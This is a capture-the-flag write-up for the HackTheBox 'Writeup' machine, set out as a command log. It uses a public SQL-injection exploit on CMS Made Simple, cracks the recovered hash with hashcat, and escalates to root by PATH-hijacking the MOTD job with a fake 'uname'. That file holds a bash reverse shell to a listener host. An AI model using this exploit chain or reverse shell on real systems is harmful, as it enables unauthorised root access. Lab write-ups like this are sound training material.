Writeup

$ nmap -p- -T4 -A 10.10.10.138
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  tcpwrapped
$ dirb http://10.10.10.138
$ nikto -h http://10.10.10.138
OWASP ZAP
http://10.10.10.138/writeup/
http://10.10.10.138/writeup/index.php?page=writeup
http://10.10.10.138/writeup/index.php?page=ypuffy
http://10.10.10.138/writeup/index.php?page=blue

http://10.10.10.138/robots.txt
# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/
view-source:http://10.10.10.138/writeup/index.php?page=writeup
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
jkr@writeup.htb

$ sudo npm i -g wappalyzer
$ wappalyzer http://10.10.10.138/writeup/ | jq
CMS Made Simple
CMS Made Simple < 2.2.10 - SQL Injection
https://www.exploit-db.com/exploits/46635
wget https://www.exploit-db.com/download/46635
python3 46635.py -u http://10.10.10.138/writeup

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
$ hash-identifier 62def4866937f08cc13bab43bb14e6f7
$ hashid 62def4866937f08cc13bab43bb14e6f7
$ echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' >  hash
$ hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt 
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
$ ssh jkr@10.10.10.138
jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
jkr@writeup:~$ cat user.txt
d4e493fd4068afc9eb1aa6a55319f978
PATH HIJACKING — root's MOTD job (see the pspy output below) runs `run-parts` with `/usr/local/bin` first on its PATH, and `/etc/update-motd.d/10-uname` calls `uname` by bare name rather than an absolute path; because `/usr/local/bin` is owned by the `staff` group that jkr belongs to, a same-named file placed there is what root executes on the next login.
jkr@writeup:/etc/update-motd.d$ ls -la
total 12
drwxr-xr-x  2 root root 4096 Apr 19  2019 .
drwxr-xr-x 81 root root 4096 Aug 23  2019 ..
-rwxr-xr-x  1 root root   23 Jun  3  2018 10-uname
jkr@writeup:/etc/update-motd.d$ cat 10-uname 
#!/bin/sh
uname -rnsom
jkr@writeup:/etc/update-motd.d$ uname -rnsom
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

kali@kali:~/0.htb/machines/Writeup138$ scp pspy32 jkr@10.10.10.138:/tmp
jkr@writeup:/tmp$ chmod +x pspy32
jkr@writeup:/tmp$ ./pspy32
2021/07/21 10:08:12 CMD: UID=0    PID=5732   | sshd: jkr [priv]  
2021/07/21 10:08:12 CMD: UID=0    PID=5733   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new                                                                                          
2021/07/21 10:08:13 CMD: UID=0    PID=5734   | run-parts --lsbsysinit /etc/update-motd.d 
2021/07/21 10:08:13 CMD: UID=0    PID=5735   | /bin/sh /
2021/07/21 10:08:13 CMD: UID=0    PID=5735   | /bin/sh /etc/update-motd.d/10-uname 
jkr@writeup:~$ groups
jkr cdrom floppy audio dip video plugdev staff netdev
jkr@writeup:~$ find / -group staff 2>/dev/null
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/man
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
jkr@writeup:~$ 
jkr@writeup:/usr/local$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

jkr@writeup:/usr/local$ cd /tmp
jkr@writeup:/tmp$ printf '#!/bin/bash' > uname
jkr@writeup:/tmp$ printf '\nbash -i  >& /dev/tcp/10.10.14.136/4444 0>&1' >> uname
jkr@writeup:/tmp$ chmod a+x uname
jkr@writeup:/tmp$ cat uname
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.136/4444 0>&1
jkr@writeup:/tmp$ cp uname /usr/local/bin
jkr@writeup:/tmp$ 

kali@kali:~/0.htb/machines/Writeup138$ nc -lvnp 4444
kali@kali:~/0.htb/machines/Writeup138$ ssh jkr@10.10.10.138
jkr@10.10.10.138's password: 

kali@kali:~/0.htb/machines/Writeup138$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.136] from (UNKNOWN) [10.10.10.138] 37290
bash: cannot set terminal process group (5762): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# id;pwd
id;pwd
uid=0(root) gid=0(root) groups=0(root)
/
root@writeup:/# cd /root
cd /root
root@writeup:/root# ls -la
ls -la
total 28
drwx------  4 root root 4096 Aug 23  2019 .
drwxr-xr-x 22 root root 4096 Apr 19  2019 ..
lrwxrwxrwx  1 root root    9 Apr 19  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jun  3  2018 .bashrc
drwxr-xr-x  2 root root 4096 May  1  2019 .nano
-rw-r--r--  1 root root  148 Jun  3  2018 .profile
drwx------  2 root root 4096 May  1  2019 bin
-r--------  1 root root   33 Apr 19  2019 root.txt
root@writeup:/root# cat root.txt
cat root.txt
eeba47f60b48ef92b734f9b6198d7226
root@writeup:/root# 
